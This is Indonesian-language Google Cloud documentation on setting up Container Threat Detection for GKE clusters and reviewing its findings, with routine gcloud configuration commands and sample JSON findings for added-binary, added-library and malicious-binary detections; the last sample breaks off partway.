Menggunakan Container Threat Detection

Halaman ini menunjukkan cara meninjau temuan Container Threat Detection di Konsol Google Cloud dan menyertakan contoh temuan Container Threat Detection.

Deteksi Ancaman Container adalah layanan bawaan dari paket Premium dan Enterprise Security Command Center.

Untuk melihat temuan Container Threat Detection, layanan harus diaktifkan di setelan Layanan Security Command Center.

Pelajari lebih lanjut cara melihat dan mengelola temuan Container Threat Detection di Meninjau temuan di halaman ini.

Untuk mengaktifkan Deteksi Ancaman Container dan detektor tingkat Premium lainnya di level project, lihat Mengaktifkan Security Command Center untuk project. Tingkat Enterprise tidak mendukung aktivasi tingkat project.

Menggunakan versi GKE yang didukung

Untuk mendeteksi potensi ancaman terhadap container, pastikan cluster Anda menggunakan Google Kubernetes Engine (GKE) versi yang didukung. Pendeteksian Ancaman Penampung mendukung versi GKE berikut untuk cluster x86 di saluran Stabil, Reguler, dan Cepat:

  • GKE Standard >= 1.15.9-gke.12
  • GKE Standard >= 1.16.5-gke.2
  • GKE Standard >= 1.17
  • GKE Standard >= 1.18.10-gke.1400
  • GKE Standard >= 1.19.2-gke.2000
  • GKE Standard >= 1.20
  • GKE Standard >= 1.21
  • GKE Autopilot >= 1.21.11-gke.900
  • GKE Standard dan Autopilot >= 1.22
  • GKE Standard dan Autopilot >= 1.23

Pendeteksian Ancaman Penampung mendukung versi GKE berikut untuk cluster Arm di saluran Stabil, Reguler, dan Cepat:

  • GKE Standard dan Autopilot >= 1.28

Container Threat Detection hanya mendukung image node Container-Optimized OS.

Mengaktifkan Container Threat Detection

Saat Anda mengaktifkan paket Security Command Center Premium atau Enterprise, Container Threat Detection akan diaktifkan secara default, kecuali jika Anda memilih untuk menonaktifkannya selama proses aktivasi.

Jika perlu mengaktifkan atau menonaktifkan Deteksi Ancaman Container untuk organisasi atau project, Anda dapat melakukannya di halaman Setelan Security Command Center. Untuk mengetahui informasi selengkapnya, lihat Mengaktifkan atau menonaktifkan layanan bawaan.

Saat Anda mengaktifkan Deteksi Ancaman Container, baik dengan mengaktifkan Security Command Center atau nanti, lakukan hal berikut:

  1. Untuk cluster yang tidak menggunakan versi GKE yang didukung, selesaikan langkah-langkah dalam panduan untuk mengupgrade cluster.
  2. Pastikan cluster Anda memiliki resource yang memadai untuk menjalankan DaemonSet Pendeteksian Ancaman Penampung.
  3. Di konsol Google Cloud, tinjau setelan pengaktifan layanan Container Threat Detection untuk memastikan bahwa Container Threat Detection diaktifkan untuk cluster Anda.

Izin IAM yang diperlukan

Container Threat Detection memerlukan izin untuk mengaktifkan dan menonaktifkannya sendiri serta mengelola agen Container Threat Detection di cluster GKE.

Untuk memberikan izin yang diperlukan, peran IAM Container Threat Detection Service Agent (roles/containerthreatdetection.serviceAgent) harus diberikan ke agen layanan Container Threat Detection, yang merupakan jenis akun layanan.

Menghapus peran default ini dari agen layanan dapat menghentikan Container Threat Detection berfungsi dengan baik.

Bergantung pada cara dan waktu Security Command Center diaktifkan, nama agen layanan yang digunakan Deteksi Ancaman Container akan berbeda:

  • Jika Security Command Center diaktifkan sebelum 7 Desember 2023, Container Threat Detection akan menggunakan agen layanan yang dikelola pengguna berikut:

    service-PROJECT_NUMBER@gcp-sa-ktd-control.iam.gserviceaccount.com

  • Jika Security Command Center diaktifkan di level organisasi setelah 7 Desember 2023, Container Threat Detection akan menggunakan agen layanan level organisasi yang dikelola pengguna berikut:

    service-org-ORGANIZATION_ID@gcp-sa-ktd-hpsa.iam.gserviceaccount.com

  • Jika Security Command Center diaktifkan di level project setelah 7 Desember 2023, Container Threat Detection akan menggunakan agen layanan level organisasi yang dikelola pengguna berikut:

    service-project-PROJECT_NUMBER@gcp-sa-ktd-hpsa.iam.gserviceaccount.com

Untuk mengetahui informasi selengkapnya tentang agen layanan dan peran IAM, lihat hal berikut:

Izin yang diperlukan untuk akun layanan node GKE kustom

Saat Anda menggunakan akun layanan kustom untuk node GKE, akun layanan node baru memerlukan izin untuk berinteraksi dengan Pendeteksian Ancaman Penampung. Untuk memberikan izin ini ke akun layanan, Anda harus memberinya peran Service Account Token Creator (roles/iam.serviceAccountTokenCreator).

  1. Berikan peran Service Account Token Creator ke akun layanan node:

    gcloud iam service-accounts add-iam-policy-binding \
      SERVICE_ACCOUNT_NAME \
      --member=serviceAccount:service-PROJECT_NUMBER@compute-system.iam.gserviceaccount.com \
      --role=roles/iam.serviceAccountTokenCreator
    

    Ganti nilai berikut:

    • Ganti SERVICE_ACCOUNT_NAME dengan alamat email akun layanan node baru Anda.
    • Ganti PROJECT_NUMBER dengan nomor project tempat Deployment Deteksi Ancaman Penampung di-deploy. Hal ini penting jika berbeda dengan project akun layanan.
  2. Aktifkan Container Threat Detection API di project yang sama dengan tempat akun layanan node baru dibuat:

    gcloud services enable containerthreatdetection.googleapis.com --project PROJECT_ID
    

    Ganti PROJECT_ID dengan ID project tempat akun layanan node baru berada.

Memeriksa konfigurasi cluster GKE

Agar Deteksi Ancaman Penampung berfungsi, jika cluster Anda berada di Virtual Private Cloud (VPC), jaringannya harus memenuhi persyaratan perutean, firewall, dan DNS untuk berkomunikasi dengan Google API dan layanan Google. Untuk mengakses Google API, tinjau panduan berikut:

Selain itu, konfigurasi cluster GKE atau batasan kebijakan organisasi tidak boleh memblokir pembuatan atau penggunaan objek apa pun yang diperlukan oleh Deteksi Ancaman Penampung agar dapat berfungsi. Bagian berikut menyertakan daftar objek GKE yang dibuat oleh Container Threat Detection dan menjelaskan cara mengonfigurasi komponen GKE yang penting agar berfungsi dengan Container Threat Detection.

Objek Kubernetes

Setelah aktivasi, Pendeteksian Ancaman Container akan membuat beberapa objek GKE di cluster yang diaktifkan. Objek ini digunakan untuk memantau image container, mengelola pod dan container dengan hak istimewa, serta mengevaluasi status untuk menghasilkan temuan. Tabel berikut mencantumkan objek, propertinya, dan fungsi penting.

Objek Nama1 Properti Fungsi
ClusterRole container-watcher-pod-reader Memberikan izin get, watch, dan list pada pod
ClusterRole pod-reader Memberikan izin get, watch, dan list pada pod
ClusterRoleBinding

container-watcher-pod-reader

gce:podsecuritypolicy:container-watcher

Memberikan peran container-watcher-pod-reader dan gce:podsecuritypolicy:privileged ke ServiceAccount container-watcher-pod-reader
CustomResourceDefinition containerwatcherstatuses.containerthreatdetection.googleapis.com Pelaporan status DaemonSet
DaemonSet container-watcher2 Diberi Hak Istimewa Interaksi dengan Modul Keamanan Linux dan mesin penampung
Memasang /host/ sebagai baca dan tulis Komunikasi dengan Modul Keamanan Linux
Memasang /etc/container-watcher/secrets sebagai hanya baca untuk mengakses container-watcher-token Autentikasi
Menggunakan hostNetwork Menemukan generasi
Image
gke.gcr.io/watcher-daemonset
Pengaktifan dan upgrade
Backend
containerthreatdetection-REGION.googleapis.com:443
Menemukan generasi
Peran container-watcher-status-reporter Peran dengan kata kerja get, list, watch, create, update, patch untuk CustomResourceDefinition containerwatcherstatuses.containerthreatdetection.googleapis.com Memungkinkan pembaruan informasi status DaemonSet
RoleBinding gce:podsecuritypolicy:container-watcher Memberikan peran gce:podsecuritypolicy:privileged ke ServiceAccount container-watcher-pod-reader Mempertahankan fungsi saat PodSecurityPolicy diaktifkan
container-watcher-status-reporter Memberikan peran container-watcher-status-reporter ke ServiceAccount container-watcher-pod-reader
Rahasia container-watcher-token Autentikasi
ServiceAccount container-watcher-pod-reader Pengaktifan, upgrade, dan penonaktifan

1 Semua objek berada dalam namespace kube-system, kecuali container-watcher-pod-reader dan gce:podsecuritypolicy:container-watcher.

2 Selama penginstalan, update, atau penghapusan Pendeteksian Ancaman Penampung, Kubernetes mungkin mengeluarkan pesan error untuk objek Kubernetes atau dependensi lainnya yang untuk sementara tidak ada atau tidak lengkap. Misalnya, mungkin ada instance saat peran container-watcher-pod-reader mungkin tidak ada, yang dapat mengakibatkan pencegahan penginstalan pod watcher. Anda mungkin melihat log error seperti serviceaccount "container-watcher-pod-reader" not found yang menunjukkan masalah ini. Biasanya, error ini akan otomatis teratasi setelah Deteksi Ancaman Penampung menyelesaikan prosesnya. Kecuali jika error berlanjut selama beberapa menit, error tersebut dapat diabaikan dengan aman.

PodSecurityPolicy dan Pengontrol Penerimaan

PodSecurityPolicy adalah resource pengontrol penerimaan yang Anda siapkan untuk memvalidasi permintaan guna membuat dan mengupdate pod di cluster. Deteksi Ancaman Penampung kompatibel dengan PodSecurityPolicies yang diterapkan secara otomatis saat membuat atau mengupdate cluster dengan flag enable-pod-security-policy. Secara khusus, Container Threat Detection menggunakan kebijakan gce.privileged saat PodSecurityPolicy diaktifkan.

Jika Anda menggunakan PodSecurityPolicies kustom atau pengontrol izin lainnya, PodSecurityPolicies atau pengontrol izin tersebut tidak boleh memblokir pembuatan atau penggunaan objek yang diperlukan oleh Deteksi Ancaman Penampung untuk berfungsi. Misalnya, pengontrol akses berbasis webhook yang menolak atau mengganti deployment dengan hak istimewa dapat mencegah Deteksi Ancaman Penampung berfungsi dengan benar.

Untuk informasi selengkapnya, lihat Menggunakan PodSecurityPolicies.

Mengecualikan variabel lingkungan dari temuan Container Threat Detection

Secara default, saat menghasilkan temuan, Container Threat Detection akan melaporkan variabel lingkungan untuk semua proses yang dirujuk dalam temuan. Nilai variabel lingkungan dapat menjadi penting saat menyelidiki serangan. Namun, beberapa paket software menyimpan secret dan informasi sensitif lainnya dalam variabel lingkungan. Untuk mencegah Deteksi Ancaman Container menyertakan variabel lingkungan proses dalam temuan Deteksi Ancaman Container, nonaktifkan modul REPORT_ENVIRONMENT_VARIABLES menggunakan Google Cloud CLI atau metode securityCenterServices.patch Security Command Center Management API di tingkat organisasi, folder, atau project.

Misalnya, untuk menonaktifkan pelaporan variabel lingkungan dalam project, buat file bernama module_config.yaml dengan konten berikut:

REPORT_ENVIRONMENT_VARIABLES:
  intendedEnablementState: DISABLED

Kemudian, jalankan perintah berikut:

gcloud scc manage services update container-threat-detection \
    --module-config-file=module_config.yaml \
    --project=PROJECT_ID

Untuk memulihkan perilaku default, edit module_config.yaml agar berisi hal berikut, lalu jalankan perintah lagi:

REPORT_ENVIRONMENT_VARIABLES:
  intendedEnablementState: ENABLED

Untuk melihat semua perintah gcloud CLI guna mengelola layanan, lihat gcloud scc manage services.

Mengecualikan argumen CLI dari temuan Container Threat Detection

Semua proses memiliki satu atau beberapa argumen command line (CLI). Secara default, saat Deteksi Ancaman Container menyertakan detail proses dalam temuan, deteksi ini akan mencatat argumen CLI proses. Nilai argumen CLI dapat menjadi penting saat menyelidiki serangan. Namun, beberapa pengguna mungkin meneruskan secret dan informasi sensitif lainnya dalam argumen CLI. Untuk mencegah Container Threat Detection menyertakan argumen CLI proses dalam temuan Container Threat Detection, nonaktifkan modul REPORT_CLI_ARGUMENTS menggunakan Google Cloud CLI atau metode securityCenterServices.patch Security Command Center Management API di tingkat organisasi, folder, atau project.

Misalnya, untuk menonaktifkan pelaporan argumen CLI dalam project, buat file bernama module_config.yaml dengan konten berikut:

REPORT_CLI_ARGUMENTS:
  intendedEnablementState: DISABLED

Kemudian, jalankan perintah berikut:

gcloud scc manage services update container-threat-detection \
    --module-config-file=module_config.yaml \
    --project=PROJECT_ID

Untuk memulihkan perilaku default, edit module_config.yaml agar berisi hal berikut, lalu jalankan perintah lagi:

REPORT_CLI_ARGUMENTS:
  intendedEnablementState: ENABLED

Untuk melihat semua perintah gcloud CLI guna mengelola layanan, lihat gcloud scc manage services.

Penggunaan resource

Container Threat Detection dirancang agar memiliki dampak performa yang dapat diabaikan pada kluster Anda dan tidak boleh memiliki dampak latensi pada operasi cluster apa pun.

Penggunaan resource bergantung pada beban kerja. Namun, komponen inti Container Threat Detection—DaemonSet ruang pengguna dan Modul Keamanan Linux (LSM)—memiliki estimasi dampak performa berikut:

  • DaemonSet: Maksimum 0,125 vCPU dan memori 300 MB, berdasarkan batas keras yang ditetapkan untuk membatasi penggunaan resource. Batas terkadang dievaluasi ulang dan dapat diubah untuk mengoptimalkan performa, terutama untuk node yang sangat besar.
  • LSM: Bervariasi berdasarkan karakteristik beban kerja, tetapi, dalam kasus yang membebani LSM, kami mengamati kurang dari 2% CPU dan 1% memori. Anda dapat menguji dampak performa dengan melakukan instrumentasi pada workload dengan dan tanpa mengaktifkan Container Threat Detection.

Jika Anda adalah pelanggan BigQuery, Anda dapat mengaktifkan pengukuran penggunaan GKE untuk memantau penggunaan resource DaemonSet ruang pengguna Container Threat Detection. Untuk melihat DaemonSet ruang pengguna dalam pengukuran penggunaan, telusuri namespace kube-system dan label k8s-app=container-watcher.

Pengukuran penggunaan GKE tidak dapat melacak penggunaan CPU kernel secara khusus untuk LSM. Data tersebut disertakan dalam penggunaan CPU secara keseluruhan.

Container Threat Detection API

Container Threat Detection otomatis mengaktifkan containerthreatdetection API selama orientasi untuk memungkinkan pembuatan temuan. Anda tidak boleh berinteraksi langsung dengan API yang diperlukan ini. Menonaktifkan API ini akan merusak kemampuan Pendeteksian Ancaman Penampung untuk menghasilkan temuan baru. Jika Anda ingin berhenti menerima temuan Container Threat Detection, nonaktifkan Container Threat Detection di setelan Layanan Security Command Center.

Meninjau temuan

Saat Container Threat Detection menghasilkan temuan, Anda dapat melihatnya di Security Command Center. Jika mengonfigurasi ekspor log ke Cloud Logging, Anda juga dapat melihat temuan di Cloud Logging. Untuk membuat temuan dan memverifikasi konfigurasi, Anda dapat memicu pendeteksi secara sengaja dan menguji Container Threat Detection.

Container Threat Detection memiliki latensi berikut:

  • Latensi aktivasi 3,5 jam untuk organisasi atau project yang baru diaktifkan.
  • Latensi aktivasi menit untuk cluster yang baru dibuat.
  • Latensi deteksi beberapa menit untuk ancaman di cluster yang telah diaktifkan.

Meninjau temuan di konsol Google Cloud

Peran IAM untuk Security Command Center dapat diberikan di tingkat organisasi, folder, atau project. Kemampuan Anda untuk melihat, mengedit, membuat, atau memperbarui temuan, aset, dan sumber keamanan bergantung pada tingkat akses yang Anda terima. Untuk mempelajari peran Security Command Center lebih lanjut, lihat Kontrol akses.

Untuk meninjau temuan Deteksi Ancaman Container di Security Command Center, ikuti langkah-langkah berikut:

  1. Di konsol Google Cloud, buka halaman Temuan di Security Command Center.

    Buka Temuan

  2. Pilih project atau organisasi Google Cloud Anda.
  3. Di bagian Quick filters, di subbagian Source display name, pilih Container Threat Detection. Hasil kueri temuan diperbarui untuk hanya menampilkan temuan dari sumber ini.
  4. Untuk melihat detail temuan tertentu, klik nama temuan di kolom Kategori. Panel detail untuk temuan akan terbuka dan menampilkan tab Ringkasan.
  5. Di tab Ringkasan, tinjau detail temuan, termasuk informasi tentang apa yang terdeteksi, resource yang terpengaruh, dan—jika tersedia—langkah-langkah yang dapat Anda lakukan untuk memperbaiki temuan tersebut.
  6. Opsional: Untuk melihat definisi JSON lengkap dari temuan, klik tab JSON.

Untuk membantu penyelidikan Anda, temuan ancaman juga berisi link ke referensi eksternal berikut:

  • Entri framework MITRE ATT&CK. Framework ini menjelaskan teknik untuk serangan terhadap resource cloud dan memberikan panduan perbaikan.
  • VirusTotal, layanan milik Alphabet yang memberikan konteks tentang file, skrip, URL, dan domain yang berpotensi berbahaya.

Untuk mengetahui daftar temuan Container Threat Detection, lihat Pendeteksi Container Threat Detection.

Melihat temuan di Cloud Logging

Untuk melihat temuan Container Threat Detection di Cloud Logging, lakukan tindakan berikut:

  1. Buka Logs Explorer di konsol Google Cloud.

    Buka Logs Explorer

  2. Pilih project Google Cloud atau resource Google Cloud lainnya tempat Anda menyimpan log Event Threat Detection.

  3. Gunakan panel Kueri untuk membuat kueri dengan salah satu cara berikut:

    • Dalam daftar Semua resource, lakukan tindakan berikut:
      1. Pilih Pendeteksi Ancaman untuk menampilkan daftar semua pendeteksi.
      2. Untuk melihat temuan dari semua detektor, pilih all detector_name. Untuk melihat temuan dari pendeteksi tertentu, pilih namanya.
      3. Klik Terapkan. Tabel Hasil kueri diperbarui dengan log yang Anda pilih.
    • Masukkan kueri berikut di editor kueri, lalu klik Run query:

      resource.type="threat_detector"

      Tabel Hasil kueri diperbarui dengan log yang Anda pilih.

  4. Untuk melihat log, pilih baris tabel, lalu klik Luaskan kolom bertingkat.

Anda dapat membuat kueri log lanjutan untuk menentukan kumpulan entri log dari sejumlah log.

Contoh format temuan

Bagian ini menyertakan format JSON temuan Deteksi Ancaman Penampung.

Contoh ini berisi kolom yang paling umum untuk semua temuan. Namun, semua kolom mungkin tidak muncul di setiap temuan. Output sebenarnya yang Anda lihat bergantung pada konfigurasi resource serta jenis dan status temuan. Informasi dari Kubernetes dan containerd diberikan dengan upaya terbaik dan tidak dijamin.

Untuk mengetahui informasi selengkapnya tentang kolom dalam setiap temuan, lihat deskripsi kolom di Resource: Finding.

Menambahkan Binary Executed

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "state": "ACTIVE",
    "category": "Added Binary Executed",
    "sourceProperties": {
      "VM_Instance_Name": "INSTANCE_ID",
      "Added_Binary_Kind": "Added",
      "Container_Image_Id": "CONTAINER_IMAGE_ID",
      "Container_Name": "CONTAINER_NAME",
      "Parent_Pid": 1.0,
      "Container_Image_Uri": "CONTAINER_IMAGE_URI",
      "Process_Creation_Timestamp": {
        "seconds": 1.617989997E9,
        "nanos": 1.17396995E8
      },
      "Pid": 53.0,
      "Pod_Namespace": "default",
      "Process_Binary_Fullpath": "BINARY_PATH",
      "Process_Arguments": ["BINARY_PATH"],
      "Pod_Name": "POD_NAME",
      "description": "A binary that was not part of the original container image
      was executed. If an added binary is executed by an attacker, this is a
      possible sign that an attacker has control of the workload and they are
      executing arbitrary commands.",
      "Environment_Variables": ["KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",
      "KUBERNETES_SERVICE_PORT\u003d443", "HOSTNAME\u003dreconnect-
      test-4af235e12be6f9d9", "HOME\u003d/root",
      "KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
      "PATH\u003d/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
      "KUBERNETES_PORT_443_TCP_PORT\u003d443",
      "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp",
      "DEBIAN_FRONTEND\u003dnoninteractive",
      "KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT",
      "KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
      "KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PWD\u003d/"],
      "Container_Creation_Timestamp": {
        "seconds": 1.617989918E9,
        "nanos": 0.0
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-04-09T17:39:57.527Z",
    "createTime": "2021-04-09T17:39:57.625Z",
    "propertyDataTypes": {
      "Container_Image_Id": {
        "primitiveDataType": "STRING"
      },
      "Pod_Namespace": {
        "primitiveDataType": "STRING"
      },
      "Container_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Environment_Variables": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Added_Binary_Kind": {
        "primitiveDataType": "STRING"
      },
      "description": {
        "primitiveDataType": "STRING"
      },
      "Pid": {
        "primitiveDataType": "NUMBER"
      },
      "Process_Arguments": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Container_Image_Uri": {
        "primitiveDataType": "STRING"
      },
      "Pod_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Parent_Pid": {
        "primitiveDataType": "NUMBER"
      },
      "VM_Instance_Name": {
        "primitiveDataType": "STRING"
      },
      "Container_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Binary_Fullpath": {
        "primitiveDataType": "STRING"
      }
    },
    "severity": "LOW",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parentDisplayName": "PROJECT_ID",
    "type": "google.container.Cluster"
  }
}
    

Library yang Ditambahkan Dimuat

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findingsFINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "state": "ACTIVE",
    "category": "Added Library Loaded",
    "sourceProperties": {
      "Process_Arguments": ["BINARY_PATH", "ADDED_LIBRARY_NAME"],
      "Parent_Pid": 1.0,
      "Container_Name": "CONTAINER_NAME",
      "Added_Library_Fullpath": "ADDED_LIBRARY_PATH",
      "Container_Image_Id": "CONTAINER_IMAGE_ID",
      "Container_Creation_Timestamp": {
        "seconds": 1.618004144E9,
        "nanos": 0.0
      },
      "Pod_Name": "POD_NAME",
      "Pid": 7.0,
      "description": "A library that was not part of the original container
      image was loaded. If an added library is loaded, this is a possible sign
      that an attacker has control of the workload and they are executing
      arbitrary code.",
      "VM_Instance_Name": "INSTANCE_ID",
      "Pod_Namespace": "default",
      "Environment_Variables": ["KUBERNETES_SERVICE_PORT\u003d443",
      "KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT", "HOSTNAME\u003dsuspicious-
      library", "LD_LIBRARY_PATH\u003d/tmp", "PORT\u003d8080",
      "HOME\u003d/root", "PYTHONUNBUFFERED\u003d1",
      "KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
      "PATH\u003d/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/p
      ython3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
      , "KUBERNETES_PORT_443_TCP_PORT\u003d443",
      "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp", "LANG\u003dC.UTF-8",
      "DEBIAN_FRONTEND\u003dnoninteractive",
      "KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
      "KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT",
      "KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PWD\u003d/home/vmagent/app"],
      "Process_Binary_Fullpath": "BINARY_PATH",
      "Added_Library_Kind": "Added",
      "Container_Image_Uri": "CONTAINER_IMAGE_uri"
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-04-09T21:36:13.069Z",
    "createTime": "2021-04-09T21:36:13.267Z",
    "propertyDataTypes": {
      "Container_Image_Id": {
        "primitiveDataType": "STRING"
      },
      "Added_Library_Fullpath": {
        "primitiveDataType": "STRING"
      },
      "Container_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Pod_Namespace": {
        "primitiveDataType": "STRING"
      },
      "Environment_Variables": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "description": {
        "primitiveDataType": "STRING"
      },
      "Process_Arguments": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Pid": {
        "primitiveDataType": "NUMBER"
      },
      "Container_Image_Uri": {
        "primitiveDataType": "STRING"
      },
      "Pod_Name": {
        "primitiveDataType": "STRING"
      },
      "Added_Library_Kind": {
        "primitiveDataType": "STRING"
      },
      "Parent_Pid": {
        "primitiveDataType": "NUMBER"
      },
      "VM_Instance_Name": {
        "primitiveDataType": "STRING"
      },
      "Container_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Binary_Fullpath": {
        "primitiveDataType": "STRING"
      }
    },
    "severity": "LOW",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parentDisplayName": "PROJECT_ID",
    "type": "google.container.Cluster"
  }
}
  

Eksekusi: Program Biner Berbahaya Tambahan Dieksekusi

{
  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
    "category": "Execution: Added Malicious Binary Executed",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-11-13T19:51:22.538Z",
    "database": {},
    "eventTime": "2023-11-13T19:51:22.383Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
                {
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
                }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "COMMAND_AND_CONTROL",
      "primaryTechniques": [
        "INGRESS_TOOL_TRANSFER"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/tmp/malicious-binary-dd922bc4ee3b49fd-should-trigger\"",
          "size": "68",
          "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
          "hashedSize": "68",
          "partiallyHashed": false
        },
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"/tmp/malicious-binary-dd922bc4ee3b49fd-should-trigger\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.68.2.129:443\""
          },
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-added-test-malicious-binary\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.68.2.129\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.68.2.129:443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.68.2.129\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
          }
        ],
        "pid": "7",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "added_malicious_binary_executed"
    },
    "detectionPriority": "CRITICAL",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699905066",
